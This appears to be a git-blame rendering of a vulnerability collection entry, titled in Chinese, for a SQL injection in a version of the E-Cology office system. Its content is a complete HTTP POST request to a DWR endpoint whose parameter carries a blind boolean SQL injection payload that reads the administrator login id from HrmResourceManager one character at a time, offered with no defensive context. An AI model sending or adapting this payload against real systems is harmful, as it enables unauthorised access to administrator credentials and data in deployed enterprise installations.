2023-08-19 20:24:53 +08:00
|
|
|
## 某微 E-Cology 某版本 SQL注入漏洞
|
|
|
|
|
```
|
2023-12-08 22:40:37 +08:00
|
|
|
POST /dwr/call/plaincall/DocDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
|
|
|
|
|
Host: ip
|
2023-08-19 20:24:53 +08:00
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
|
2023-12-08 22:40:37 +08:00
|
|
|
Content-Length: 191
|
|
|
|
|
Accept-Encoding: gzip
|
2023-08-19 20:24:53 +08:00
|
|
|
Connection: close
|
|
|
|
|
Content-Type: text/plain
|
2023-12-08 22:40:37 +08:00
|
|
|
|
2023-08-19 20:24:53 +08:00
|
|
|
callCount=1
|
|
|
|
|
page=
|
|
|
|
|
httpSessionId=
|
|
|
|
|
scriptSessionId=
|
|
|
|
|
c0-scriptName=DocDwrUtil
|
|
|
|
|
c0-methodName=ifNewsCheckOutByCurrentUser
|
|
|
|
|
c0-id=0
|
2023-12-08 22:40:37 +08:00
|
|
|
c0-param0=string:1 and ascii((select substring(loginid,1,1)from HrmResourceManager))=115
|
2023-12-08 22:40:55 +08:00
|
|
|
c0-param1=string:1
|
|
|
|
|
batchId=0
|
2023-08-19 20:24:53 +08:00
|
|
|
```
|
2023-12-08 22:40:37 +08:00
|
|
|

|
|
|
|
|
|